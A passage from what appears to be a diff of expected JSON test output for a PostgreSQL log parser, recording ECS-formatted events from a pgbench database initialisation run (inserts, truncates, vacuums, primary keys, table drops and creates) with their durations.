pgbench_tellers(tid,bid,tbalance) values (3,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 77000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3767, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.077 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3844, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (4,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (4,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 52000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3974, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.052 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4051, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (5,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (5,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 90000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4181, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.090 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4258, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (6,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (6,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 75000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4388, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.075 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4465, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (7,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (7,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 59000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4595, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.059 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4672, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (8,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (8,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 72000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4802, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.072 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.102Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4879, + "message": "2021-03-17 15:10:42.102 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (9,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (9,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.102 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.102Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 77000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5009, + "message": "2021-03-17 15:10:42.102 UTC [137] postgres@accounts LOG: duration: 0.077 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.102 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.102Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5086, + "message": "2021-03-17 15:10:42.102 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (10,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (10,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.102 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.102Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 73000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5217, + "message": "2021-03-17 15:10:42.102 UTC [137] postgres@accounts LOG: duration: 0.073 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.102 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.102Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5294, + "message": "2021-03-17 15:10:42.102 UTC [137] postgres@accounts LOG: statement: commit", + "postgresql.log.database": "accounts", + "postgresql.log.query": "commit", + "postgresql.log.timestamp": "2021-03-17 15:10:42.102 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.103Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 879000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5370, + "message": "2021-03-17 15:10:42.103 UTC [137] postgres@accounts LOG: duration: 0.879 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.103 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.103Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5447, + "message": "2021-03-17 15:10:42.103 UTC [137] postgres@accounts LOG: statement: begin", + "postgresql.log.database": "accounts", + "postgresql.log.query": "begin", + "postgresql.log.timestamp": "2021-03-17 15:10:42.103 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.103Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 62000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5522, + "message": "2021-03-17 15:10:42.103 UTC [137] postgres@accounts LOG: duration: 0.062 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.103 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.103Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5599, + "message": "2021-03-17 15:10:42.103 UTC [137] postgres@accounts LOG: statement: truncate pgbench_accounts", + "postgresql.log.database": "accounts", + "postgresql.log.query": "truncate pgbench_accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.103 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.103Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 363000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5694, + "message": "2021-03-17 15:10:42.103 UTC [137] postgres@accounts LOG: duration: 0.363 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.103 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.103Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5771, + "message": "2021-03-17 15:10:42.103 UTC [137] postgres@accounts LOG: statement: copy pgbench_accounts from stdin", + "postgresql.log.database": "accounts", + "postgresql.log.query": "copy pgbench_accounts from stdin", + "postgresql.log.timestamp": "2021-03-17 15:10:42.103 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.295Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 192094000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5873, + "message": "2021-03-17 15:10:42.295 UTC [137] postgres@accounts LOG: duration: 192.094 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.295 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.296Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5952, + "message": "2021-03-17 15:10:42.296 UTC [137] postgres@accounts LOG: statement: commit", + "postgresql.log.database": "accounts", + "postgresql.log.query": "commit", + "postgresql.log.timestamp": "2021-03-17 15:10:42.296 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.297Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 1318000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6028, + "message": "2021-03-17 15:10:42.297 UTC [137] postgres@accounts LOG: duration: 1.318 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.297 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.297Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6105, + "message": "2021-03-17 15:10:42.297 UTC [137] postgres@accounts LOG: statement: vacuum analyze pgbench_branches", + "postgresql.log.database": "accounts", + "postgresql.log.query": "vacuum analyze pgbench_branches", + "postgresql.log.timestamp": "2021-03-17 15:10:42.297 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.314Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 17051000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6206, + "message": "2021-03-17 15:10:42.314 UTC [137] postgres@accounts LOG: duration: 17.051 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.314 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.314Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6284, + "message": "2021-03-17 15:10:42.314 UTC [137] postgres@accounts LOG: statement: vacuum analyze pgbench_tellers", + "postgresql.log.database": "accounts", + "postgresql.log.query": "vacuum analyze pgbench_tellers", + "postgresql.log.timestamp": "2021-03-17 15:10:42.314 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.317Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 2798000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6384, + "message": "2021-03-17 15:10:42.317 UTC [137] postgres@accounts LOG: duration: 2.798 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.317 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.317Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6461, + "message": "2021-03-17 15:10:42.317 UTC [137] postgres@accounts LOG: statement: vacuum analyze pgbench_accounts", + "postgresql.log.database": "accounts", + "postgresql.log.query": "vacuum analyze pgbench_accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.317 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.406Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 88800000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6562, + "message": "2021-03-17 15:10:42.406 UTC [137] postgres@accounts LOG: duration: 88.800 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.406 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.406Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6640, + "message": "2021-03-17 15:10:42.406 UTC [137] postgres@accounts LOG: statement: vacuum analyze pgbench_history", + "postgresql.log.database": "accounts", + "postgresql.log.query": "vacuum analyze pgbench_history", + "postgresql.log.timestamp": "2021-03-17 15:10:42.406 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.406Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 442000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6740, + "message": "2021-03-17 15:10:42.406 UTC [137] postgres@accounts LOG: duration: 0.442 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.406 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.406Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6817, + "message": "2021-03-17 15:10:42.406 UTC [137] postgres@accounts LOG: statement: alter table pgbench_branches add primary key (bid)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "alter table pgbench_branches add primary key (bid)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.406 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.409Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 2602000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6937, + "message": "2021-03-17 15:10:42.409 UTC [137] postgres@accounts LOG: duration: 2.602 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.409 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.409Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7014, + "message": "2021-03-17 15:10:42.409 UTC [137] postgres@accounts LOG: statement: alter table pgbench_tellers add primary key (tid)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "alter table pgbench_tellers add primary key (tid)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.409 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.411Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 2433000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7133, + "message": "2021-03-17 15:10:42.411 UTC [137] postgres@accounts LOG: duration: 2.433 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.411 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.411Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7210, + "message": "2021-03-17 15:10:42.411 UTC [137] postgres@accounts LOG: statement: alter table pgbench_accounts add primary key (aid)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "alter table pgbench_accounts add primary key (aid)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.411 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.454Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 42396000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7330, + "message": "2021-03-17 15:10:42.454 UTC [137] postgres@accounts LOG: duration: 42.396 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.454 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.222Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7408, + "message": "2021-03-17 15:10:44.222 UTC [139] postgres@accounts LOG: statement: drop table if exists pgbench_history", + "postgresql.log.database": "accounts", + "postgresql.log.query": "drop table if exists pgbench_history", + "postgresql.log.timestamp": "2021-03-17 15:10:44.222 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.226Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 4849000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7514, + "message": "2021-03-17 15:10:44.226 UTC [139] postgres@accounts LOG: duration: 4.849 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.226 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.228Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7591, + "message": "2021-03-17 15:10:44.228 UTC [139] postgres@accounts LOG: statement: create table pgbench_history(tid int,bid int,aid int,delta int,mtime timestamp,filler char(22))", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_history(tid int,bid int,aid int,delta int,mtime timestamp,filler char(22))", + "postgresql.log.timestamp": "2021-03-17 15:10:44.228 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.231Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 3311000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7759, + "message": "2021-03-17 15:10:44.231 UTC [139] postgres@accounts LOG: duration: 3.311 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.231 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.232Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7836, + "message": "2021-03-17 15:10:44.232 UTC [139] postgres@accounts LOG: statement: drop table if exists pgbench_tellers", + "postgresql.log.database": "accounts", + "postgresql.log.query": "drop table if exists pgbench_tellers", + "postgresql.log.timestamp": "2021-03-17 15:10:44.232 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.235Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 3302000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7942, + "message": "2021-03-17 15:10:44.235 UTC [139] postgres@accounts LOG: duration: 3.302 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.235 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.236Z", + "event.category": [ + "database" + ], + 